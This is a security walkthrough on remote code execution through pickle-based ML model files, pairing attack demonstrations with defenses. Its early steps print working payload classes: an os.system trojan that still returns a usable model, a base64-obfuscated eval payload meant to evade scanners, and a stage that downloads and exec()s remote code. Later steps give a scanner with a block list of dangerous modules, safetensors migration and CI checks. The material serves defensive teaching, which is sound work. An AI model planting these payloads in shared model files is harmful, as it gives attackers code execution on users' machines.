Model Serialization RCE
Remote code execution through malicious model files using pickle deserialization, safetensors manipulation, and other model serialization format vulnerabilities.
Machine learning models are typically saved as serialized Python objects using formats like pickle (.pkl, .pt, .bin). Python's pickle module can deserialize arbitrary Python objects, including objects whose construction triggers code execution. A malicious model file can execute arbitrary code the moment it is loaded with torch.load(), pickle.load(), or joblib.load(). This is not a bug in pickle -- it is a fundamental design property. This walkthrough demonstrates the vulnerability, builds detection tools, and covers migration to safer formats.
Step 1: Understanding Pickle Deserialization
Python's pickle protocol serializes an object by calling its __reduce__ method, which may return an arbitrary callable with arbitrary arguments; that callable is recorded in the pickle stream and invoked when the stream is deserialized. This is the core of the vulnerability.
"""
Demonstrate how pickle deserialization executes arbitrary code.
WARNING: Only run in a sandboxed environment.
"""
import pickle
import io
class MaliciousPayload:
    """A class that executes code when unpickled.

    When pickle reconstructs this object, it calls os.system()
    with the provided command.

    NOTE(review): intentionally-offensive demo code -- kept byte-for-byte,
    comments only. Never unpickle an instance outside a sandbox.
    """

    def __init__(self, command: str):
        # Shell command that will run on the *loading* machine at
        # pickle.load() time -- not when this object is constructed.
        self.command = command

    def __reduce__(self):
        """Called during pickling to determine how to reconstruct the object.

        Returns a tuple of (callable, args) that pickle will call
        during deserialization.
        """
        # Local import keeps 'os' out of module scope; the pickle stream
        # still records a global reference to os.system.
        import os
        return (os.system, (self.command,))
# Demonstrate the mechanism WITHOUT executing anything harmful
class SafeDemo:
    """Harmless stand-in showing how __reduce__ drives unpickling.

    Deserializing an instance invokes print() rather than anything
    destructive, proving that pickle.loads() runs attacker-chosen code.
    """

    def __reduce__(self):
        # Same (callable, args) contract an attacker abuses -- here the
        # callable is the builtin print, so the only effect is a message.
        banner = "PICKLE DESERIALIZATION EXECUTED THIS CODE"
        return (print, (banner,))
# Serialize and deserialize the safe demo
payload_bytes = pickle.dumps(SafeDemo())
print(f"Serialized payload: {len(payload_bytes)} bytes")
print("Deserializing...")
# pickle.loads() invokes the callable recorded by SafeDemo.__reduce__,
# i.e. print(...); 'result' is therefore print's return value, None.
result = pickle.loads(payload_bytes)
# Output: "PICKLE DESERIALIZATION EXECUTED THIS CODE"
# Show what the serialized bytes contain
print(f"\nPickle opcodes preview:")
import pickletools
pickletools.dis(io.BytesIO(payload_bytes))Step 2: Creating Malicious Model Files
Demonstrate how a real PyTorch model file can carry a hidden payload.
"""
Create a PyTorch model file that contains both a legitimate model
and a hidden code execution payload.
WARNING: This creates files that execute code on load.
Only use in sandboxed environments for security research.
"""
import torch
import pickle
import io
import os
class TrojanedModel:
    """A model wrapper that executes a payload when deserialized.

    The model functions normally after loading, making the trojan
    difficult to detect through behavioral testing alone.

    NOTE(review): offensive demo code -- left byte-identical, comments only.
    """

    def __init__(self, legitimate_model, payload_command: str):
        # The real model (a state_dict here) handed back to the victim on load.
        self.model = legitimate_model
        # Command string passed to _reconstruct on the loading machine.
        self.payload = payload_command
        # Set-but-unused flag; note __reduce__ bypasses __init__ entirely
        # at load time, so this never exists on the deserialized side.
        self._payload_executed = False

    def __reduce__(self):
        # Return a tuple that:
        # 1. Executes the payload
        # 2. Returns the legitimate model so everything appears normal
        return (
            self._reconstruct,
            (self.model, self.payload),
        )

    @staticmethod
    def _reconstruct(model, payload):
        """Called during deserialization. Executes payload, returns model."""
        # In a real attack, this would be: os.system(payload)
        # For this demo, we just log the attempt
        print(f"[PAYLOAD WOULD EXECUTE]: {payload}")
        # Return the legitimate model so the caller gets what they expect
        return model
def create_trojan_model_file(
    output_path: str,
    payload_command: str = "echo 'RCE achieved' > /tmp/pwned.txt",
) -> dict:
    """Create a .pt file containing a trojaned model.

    Saves a TrojanedModel wrapper with torch.save(); the payload fires
    when a victim later calls torch.load() on the file. Returns a small
    summary dict (path, size, payload, format).
    """
    # Create a legitimate small model
    model = torch.nn.Sequential(
        torch.nn.Linear(10, 64),
        torch.nn.ReLU(),
        torch.nn.Linear(64, 1),
    )
    # Wrap the plain-tensor state_dict with the trojan carrier
    trojaned = TrojanedModel(model.state_dict(), payload_command)
    # Save as a normal .pt file -- indistinguishable by extension alone
    torch.save(trojaned, output_path)
    file_size = os.path.getsize(output_path)
    return {
        "file": output_path,
        "size_bytes": file_size,
        "payload": payload_command,
        "format": "PyTorch (.pt)",
    }
# Create proof-of-concept (safe payload)
result = create_trojan_model_file(
"/tmp/trojaned_model.pt",
payload_command="echo 'Security test: RCE via model deserialization'",
)
print(f"Created trojaned model: {result['file']} ({result['size_bytes']} bytes)")
print(f"Payload: {result['payload']}")
print("\nWhen someone runs: model = torch.load('/tmp/trojaned_model.pt')")
print("The payload executes automatically.")Step 3: Advanced Payload Techniques
More sophisticated payloads that are harder to detect through static analysis.
"""
Advanced payload techniques that evade basic pickle scanning.
"""
import pickle
import base64
import zlib
class ObfuscatedPayload:
    """Payload that uses indirection to evade simple scanning.

    Instead of directly calling os.system, this uses eval()
    with an encoded command string.
    """

    def __init__(self, command: str):
        # Base64-encode the command to hide it from string scanning
        self.encoded = base64.b64encode(command.encode()).decode()

    def __reduce__(self):
        # Use eval with base64 decoding to reconstruct the command
        # This avoids having 'os.system' appear in the pickle stream;
        # the stream instead references builtins.eval, which a scanner
        # must match exactly to catch.
        return (
            eval,
            (f"__import__('os').system(__import__('base64').b64decode('{self.encoded}').decode())",),
        )
class MultiStagePayload:
    """A multi-stage payload that downloads and executes a second stage.

    Stage 1 (in pickle): Download a script from a URL
    Stage 2 (downloaded): The actual malicious payload
    """

    def __init__(self, stage2_url: str):
        # URL fetched by stage 1 at unpickling time.
        self.url = stage2_url

    def __reduce__(self):
        # Stage 1: Use urllib to fetch and exec stage 2.
        # The f-string bakes the URL into the source that exec() runs;
        # the statements are top-level, so no indentation is required.
        code = f"""
import urllib.request
response = urllib.request.urlopen('{self.url}')
exec(response.read())
"""
        return (exec, (code,))
class ChainedPayload:
    """Chain multiple operations during deserialization."""

    def __reduce__(self):
        # A single exec() call can run an arbitrary script: reverse shells,
        # data exfiltration, persistence. Here it only drops a marker file
        # to prove execution.
        # NOTE(review): the body of the 'with' block must be indented inside
        # the source string or exec() raises IndentationError; indentation
        # restored here (it was lost in the original formatting).
        operations = """
import socket, subprocess, os
# Example: create a marker file to prove execution
with open('/tmp/model_rce_proof.txt', 'w') as f:
    f.write(f'RCE achieved at {__import__("datetime").datetime.now()}')
    f.write(f'\\nUser: {os.getenv("USER", "unknown")}')
    f.write(f'\\nCWD: {os.getcwd()}')
"""
        return (exec, (operations,))
# Demonstrate obfuscation effectiveness
payload = ObfuscatedPayload("echo test")
serialized = pickle.dumps(payload)
# Show that 'os.system' does not appear in the serialized bytes
payload_str = serialized.decode("latin-1")
print(f"Contains 'os.system': {'os.system' in payload_str}")
print(f"Contains 'eval': {'eval' in payload_str}")
print(f"Serialized size: {len(serialized)} bytes")Step 4: Scanning Model Files for Malicious Content
Build tools to detect potentially malicious model files before loading them.
"""
Model file security scanner that detects malicious pickle content.
"""
import pickle
import pickletools
import io
import os
from pathlib import Path
from dataclasses import dataclass
from typing import Optional
@dataclass
class ScanResult:
file_path: str
is_safe: bool
risk_level: str # "safe", "suspicious", "dangerous"
dangerous_opcodes: list[str]
dangerous_imports: list[str]
file_format: str
recommendation: str
class ModelFileScanner:
"""Scan model files for malicious pickle content."""
# Opcodes that indicate potential code execution
DANGEROUS_OPCODES = {
"GLOBAL", "INST", "REDUCE", "BUILD",
"STACK_GLOBAL", "NEWOBJ", "NEWOBJ_EX",
}
# Modules/functions that should never appear in model files
DANGEROUS_IMPORTS = {
"os", "subprocess", "sys", "shutil", "socket",
"http", "urllib", "requests", "paramiko",
"builtins.eval", "builtins.exec", "builtins.compile",
"builtins.__import__", "webbrowser", "ctypes",
"pty", "commands", "pdb",
}
# Safe modules expected in model files
SAFE_IMPORTS = {
"torch", "numpy", "collections", "typing",
"_codecs", "copyreg", "_rebuild",
}
def scan_file(self, file_path: str) -> ScanResult:
"""Scan a model file for potential threats."""
path = Path(file_path)
if path.suffix == ".safetensors":
return ScanResult(
file_path=file_path,
is_safe=True,
risk_level="safe",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="safetensors",
recommendation="Safe format: safetensors does not support code execution",
)
if path.suffix in (".onnx",):
return ScanResult(
file_path=file_path,
is_safe=True,
risk_level="safe",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="ONNX",
recommendation="Safe format: ONNX is a declarative format",
)
# Pickle-based formats
return self._scan_pickle_file(file_path)
def _scan_pickle_file(self, file_path: str) -> ScanResult:
"""Deep scan of pickle-based model files."""
dangerous_ops = []
dangerous_imports = []
try:
with open(file_path, "rb") as f:
data = f.read()
# Analyze pickle opcodes
ops = list(pickletools.genops(io.BytesIO(data)))
for opcode, arg, pos in ops:
if opcode.name in self.DANGEROUS_OPCODES:
dangerous_ops.append(f"{opcode.name} at position {pos}")
if opcode.name in ("GLOBAL", "STACK_GLOBAL") and arg:
module_func = str(arg)
module = module_func.split(".")[0] if "." in module_func else module_func.split(" ")[0]
if module not in self.SAFE_IMPORTS:
for dangerous in self.DANGEROUS_IMPORTS:
if dangerous in module_func.lower():
dangerous_imports.append(module_func)
break
except Exception as e:
return ScanResult(
file_path=file_path,
is_safe=False,
risk_level="suspicious",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="unknown",
recommendation=f"Could not parse file: {e}",
)
# Determine risk level
if dangerous_imports:
risk = "dangerous"
safe = False
rec = f"BLOCK: Found dangerous imports: {', '.join(dangerous_imports[:5])}"
elif len(dangerous_ops) > 10:
risk = "suspicious"
safe = False
rec = "WARNING: Unusual number of code execution opcodes"
else:
risk = "safe"
safe = True
rec = "No obvious threats detected (but pickle is inherently unsafe)"
return ScanResult(
file_path=file_path,
is_safe=safe,
risk_level=risk,
dangerous_opcodes=dangerous_ops[:10],
dangerous_imports=dangerous_imports,
file_format="pickle",
recommendation=rec,
)
# Usage
scanner = ModelFileScanner()
# Scan the trojaned model created in Step 2 (skip silently if absent)
if os.path.exists("/tmp/trojaned_model.pt"):
    result = scanner.scan_file("/tmp/trojaned_model.pt")
    print(f"File: {result.file_path}")
    print(f"Safe: {result.is_safe}")
    print(f"Risk: {result.risk_level}")
    print(f"Dangerous imports: {result.dangerous_imports}")
print(f"Recommendation: {result.recommendation}")Step 5: Using Fickling for Deep Analysis
"""
Use the fickling library for deeper pickle security analysis.
Fickling provides both static analysis and safe unpickling.
"""
from pathlib import Path
def analyze_with_fickling(file_path: str) -> dict:
    """Deep analysis of a pickle file using the fickling library.

    BUGFIX: fickling's check_safety() operates on a parsed Pickled AST,
    not on a file path, so the stream is parsed first.

    NOTE(review): fickling's API has shifted across releases -- confirm
    the Pickled.load / check_safety signatures against the pinned version.

    Args:
        file_path: Path to a pickle-based model file.

    Returns:
        Dict with the analysis verdict; "analysis_complete" is False when
        fickling is unavailable or the file cannot be analyzed.
    """
    try:
        from fickling.analysis import check_safety
        from fickling.fickle import Pickled

        with open(file_path, "rb") as f:
            pickled = Pickled.load(f)
        result = check_safety(pickled)
        # Attribute access is defensive (getattr) because result-object
        # fields have varied between fickling versions.
        return {
            "file": file_path,
            "is_likely_safe": getattr(result, "is_likely_safe", None),
            "severity": getattr(result, "severity", None),
            "issues": [str(issue) for issue in getattr(result, "issues", [])],
            "analysis_complete": True,
        }
    except ImportError:
        return {
            "file": file_path,
            "error": "fickling not installed: pip install fickling",
            "analysis_complete": False,
        }
    except Exception as e:
        return {
            "file": file_path,
            "error": str(e),
            "analysis_complete": False,
        }
def safe_model_load(file_path: str) -> dict:
    """Attempt to safely load a model file with multiple strategies."""
    suffix = Path(file_path).suffix
    attempts: list[dict] = []

    # Preferred: safetensors files cannot execute code on load.
    if suffix == ".safetensors":
        try:
            from safetensors.torch import load_file
            load_file(file_path)
            attempts.append({"method": "safetensors", "success": True})
            return {"loaded": True, "method": "safetensors", "strategies": attempts}
        except Exception as e:
            attempts.append({"method": "safetensors", "error": str(e)})

    # Next best: restrict torch's unpickler to tensor data (PyTorch 2.0+).
    if suffix in (".pt", ".pth", ".bin"):
        try:
            import torch
            torch.load(file_path, weights_only=True)
            attempts.append({"method": "weights_only", "success": True})
            return {"loaded": True, "method": "weights_only", "strategies": attempts}
        except Exception as e:
            attempts.append({"method": "weights_only", "error": str(e)})

    # Last resort: static scan only -- even a clean scan does not justify
    # actually unpickling the file, so nothing is loaded on this path.
    scan = ModelFileScanner().scan_file(file_path)
    attempts.append({"method": "scan_then_load", "scan": scan.risk_level})
    if scan.is_safe:
        return {"loaded": False, "method": "scan_passed_but_not_loaded", "strategies": attempts}
    return {"loaded": False, "method": "blocked_by_scan", "strategies": attempts}
# Import the scanner from previous step for reference
from dataclasses import dataclass
print("Fickling analysis and safe loading ready")Step 6: Migrating to Safe Formats
"""
Tools and patterns for migrating from pickle to safe serialization formats.
"""
import torch
from pathlib import Path
def convert_pt_to_safetensors(
    input_path: str,
    output_path: str,
    *,
    allow_unsafe_fallback: bool = True,
) -> dict:
    """Convert a PyTorch .pt file to safetensors format.

    safetensors only stores tensors (no arbitrary Python objects),
    making it immune to deserialization attacks.

    Args:
        input_path: Source checkpoint (.pt/.pth/.bin).
        output_path: Destination .safetensors file.
        allow_unsafe_fallback: When True (default, matching the original
            behavior) fall back to a full unpickling load if
            weights_only=True fails. SECURITY: the fallback executes any
            code embedded in the file -- only enable inside a sandbox.

    Returns:
        Result dict; the "success" key is now always present
        (BUGFIX: the ImportError branch previously omitted it, so callers
        checking result.get("success") saw None instead of False).
    """
    try:
        from safetensors.torch import save_file

        # Load with weights_only for safety
        try:
            state_dict = torch.load(input_path, weights_only=True)
        except Exception:
            if not allow_unsafe_fallback:
                raise
            print("WARNING: weights_only=True failed, file may contain non-tensor data")
            print("Attempting unsafe load in sandboxed context...")
            state_dict = torch.load(input_path, map_location="cpu")
        # If result is a full model object (not a state_dict), extract it
        if hasattr(state_dict, "state_dict"):
            state_dict = state_dict.state_dict()
        elif not isinstance(state_dict, dict):
            raise ValueError(f"Unexpected type: {type(state_dict)}")
        # safetensors can only hold tensors; drop everything else
        tensor_dict = {
            k: v for k, v in state_dict.items()
            if isinstance(v, torch.Tensor)
        }
        save_file(tensor_dict, output_path)
        return {
            "input": input_path,
            "output": output_path,
            "tensors_converted": len(tensor_dict),
            "original_keys": len(state_dict),
            "success": True,
        }
    except ImportError:
        return {"error": "safetensors not installed: pip install safetensors", "success": False}
    except Exception as e:
        return {"error": str(e), "success": False}
def batch_convert_directory(
    input_dir: str,
    output_dir: str,
    extensions: tuple = (".pt", ".pth", ".bin"),
) -> list[dict]:
    """Convert all pickle-based model files in a directory."""
    source = Path(input_dir)
    target = Path(output_dir)
    target.mkdir(parents=True, exist_ok=True)
    outcomes: list[dict] = []
    # Walk recursively; anything with a pickle-era extension gets converted.
    for candidate in source.rglob("*"):
        if candidate.suffix not in extensions:
            continue
        destination = target / candidate.with_suffix(".safetensors").name
        outcome = convert_pt_to_safetensors(str(candidate), str(destination))
        outcomes.append(outcome)
        status = "OK" if outcome.get("success") else "FAIL"
        print(f" {candidate.name}: {status}")
    return outcomes
print("Model format conversion tools ready")Step 7: CI/CD Security Integration
"""
Integrate model file scanning into CI/CD pipelines.
"""
import json
import sys
from pathlib import Path
from dataclasses import asdict
def ci_scan_models(
    directory: str,
    fail_on_risk: str = "suspicious",
    report_path: str = "model_scan_report.json",
) -> int:
    """Scan all model files in a directory for CI/CD pipelines.

    Args:
        directory: Root directory to search recursively.
        fail_on_risk: Lowest risk level that fails the build
            ("safe" < "suspicious" < "dangerous"); unknown values
            default to the "suspicious" threshold.
        report_path: Where to write the JSON report (previously
            hard-coded to the CWD; parameterized so CI jobs can direct
            the artifact, default unchanged).

    Returns:
        Exit code 0 (pass) or 1 (fail) for CI integration.
    """
    scanner = ModelFileScanner()
    risk_levels = {"safe": 0, "suspicious": 1, "dangerous": 2}
    threshold = risk_levels.get(fail_on_risk, 1)
    model_extensions = {".pt", ".pth", ".pkl", ".bin", ".joblib", ".safetensors", ".onnx"}
    results = []
    max_risk = 0
    for path in Path(directory).rglob("*"):
        if path.suffix not in model_extensions:
            continue
        result = scanner.scan_file(str(path))
        results.append(asdict(result))
        max_risk = max(max_risk, risk_levels.get(result.risk_level, 1))
        icon = "PASS" if result.is_safe else "FAIL"
        print(f" [{icon}] {path.name}: {result.risk_level}")
        if not result.is_safe:
            print(f" {result.recommendation}")
    # Persist results as a JSON artifact for the CI run
    report = {
        "total_files": len(results),
        "dangerous": sum(1 for r in results if r["risk_level"] == "dangerous"),
        "suspicious": sum(1 for r in results if r["risk_level"] == "suspicious"),
        "safe": sum(1 for r in results if r["risk_level"] == "safe"),
        "results": results,
    }
    with open(report_path, "w") as f:
        json.dump(report, f, indent=2)
    passed = max_risk < threshold
    print(f"\n{'PASSED' if passed else 'FAILED'}: {report['safe']} safe, "
          f"{report['suspicious']} suspicious, {report['dangerous']} dangerous")
    return 0 if passed else 1
# GitHub Actions integration example
GITHUB_ACTION_YAML = """
# .github/workflows/model-security.yml
name: Model File Security Scan
on:
pull_request:
paths:
- 'models/**'
- '*.pt'
- '*.pkl'
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install fickling safetensors torch
- run: python scripts/scan_models.py models/
- uses: actions/upload-artifact@v4
if: always()
with:
name: model-scan-report
path: model_scan_report.json
"""
print("CI/CD model scanning integration ready")Step 8: Comprehensive Defense Strategy
"""
Complete defense strategy for model file security.
"""
from dataclasses import dataclass
from typing import Optional
from pathlib import Path
@dataclass
class ModelSecurityPolicy:
    """Declarative policy for which model files may be loaded."""

    allowed_formats: list[str]   # extensions (no dot) loadable without a deep scan
    require_scanning: bool       # deep-scan pickle-based formats before loading
    require_provenance: bool     # demand verified origin metadata
    sandbox_loading: bool        # load in an isolated process/container
    max_file_size_mb: int        # reject anything larger


# Sensible defaults: only code-execution-free formats, everything scanned.
RECOMMENDED_POLICY = ModelSecurityPolicy(
    allowed_formats=["safetensors", "onnx"],
    require_scanning=True,
    require_provenance=True,
    sandbox_loading=True,
    max_file_size_mb=5000,
)


class ModelSecurityGateway:
    """Enforce security policy for model file loading."""

    def __init__(self, policy: ModelSecurityPolicy):
        self.policy = policy

    def validate_and_load(self, file_path: str) -> dict:
        """Validate a model file against security policy before loading.

        Returns a dict with per-check details and an overall "approved"
        verdict. BUGFIX: a missing file previously escaped as a
        FileNotFoundError from path.stat(); it now fails the new
        existence check and returns a normal blocked verdict.
        """
        path = Path(file_path)
        checks = []
        # Check 0: the file must exist (stat/scan below would crash otherwise)
        exists = path.is_file()
        checks.append({"check": "exists", "passed": exists,
                       "detail": f"Path: {file_path}"})
        # Check 1: File format
        format_safe = path.suffix.lstrip(".") in self.policy.allowed_formats
        checks.append({"check": "format", "passed": format_safe,
                       "detail": f"Format: {path.suffix}"})
        if exists and not format_safe and self.policy.require_scanning:
            # Check 2: Deep scan for pickle files
            scanner = ModelFileScanner()
            scan = scanner.scan_file(file_path)
            checks.append({"check": "scan", "passed": scan.is_safe,
                           "detail": scan.recommendation})
        if exists:
            # Check 3: File size
            size_mb = path.stat().st_size / (1024 * 1024)
            size_ok = size_mb <= self.policy.max_file_size_mb
            checks.append({"check": "size", "passed": size_ok,
                           "detail": f"{size_mb:.1f} MB"})
        all_passed = all(c["passed"] for c in checks)
        return {
            "file": file_path,
            "approved": all_passed,
            "checks": checks,
            "recommendation": "Load approved" if all_passed else "Loading blocked by security policy",
        }
# Module-level gateway wired to the recommended policy, ready to import.
gateway = ModelSecurityGateway(RECOMMENDED_POLICY)
print("Model security gateway ready")
print(f"Policy: {RECOMMENDED_POLICY}")Related Topics
- Model Hub Supply Chain Attack -- How malicious models reach users
- Dependency Confusion in ML -- Package-level supply chain attacks
- Inference Endpoint Exploitation -- Post-deployment attack surface
Why does torch.load() on an untrusted file pose a critical security risk?